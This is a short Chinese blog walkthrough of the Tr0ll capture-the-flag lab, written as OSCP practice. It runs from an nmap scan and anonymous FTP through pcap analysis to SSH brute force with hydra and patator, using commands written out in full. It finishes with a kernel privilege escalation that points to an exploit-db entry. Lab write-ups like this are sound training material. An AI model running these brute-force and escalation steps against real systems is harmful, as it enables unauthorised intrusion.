第一步:nmap
第二步:发现允许匿名访问(Anonymous/Anonymous)
是pcap数据包文件,用tcpdump分析
tcpdump用法详解:https://www.jianshu.com/p/1ff7f77e2718
sup3rs3cr3tdirlol
访问http://192.168.107.145/sup3rs3cr3tdirlol得到roflmao
下载roflmao
cd ~/Downloads
file roflmao
chmod +x roflmao
./roflmao
Find address 0x0856BF to proceed
good_luck里面内容构建用户名列表,内容包含密码(文件名为密码)
第三步:which_one_lol.txt构建用户名目录,尝试hydra有报错,直接手工得到overflow用户权限
good_luck里面内容构建用户名目录,内容包含密码(文件名为密码)
使用hydra -L进行用户名密码ssh暴力破解
hydra -L usernames -p Pass.txt 192.168.107.145 ssh -t1
有报错信息,手工尝试吧,获得overflow
之前尝试过使用Patator可暴力破解 加ignore成功
Patator 是出于使用 Hydra、美杜莎、Ncrack、Metasploit 模块和 Nmap NSE 脚本进行密码猜测攻击而沮丧而编写的。我选择了另一种方法,以免再制造一种暴力强迫工具,避免重复同样的缺点。Patator 是一种用 Python 书写的多线程工具,它努力比他的前任们更可靠、更灵活。
git clone https://github.com/lanjelot/patator.git
cd patator
python -W ignore patator.py ssh_login host=(靶机IP) user=FILE0 0=/home/kali/usernames password=Pass.txt
第四步:查看内核版本,进行权限提升
获取系统为Ubuntu 14.04.1 LTS
可通过:https://www.exploit-db.com/raw/37292(Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)本地提权)
最终成功获取root权限,并成功获取flag
完结撒花~
标签:用户名,roflmao,Tr0ll,patator,密码,ssh,靶机,com,OSCP From: https://www.cnblogs.com/justdoIT20680/p/17872580.html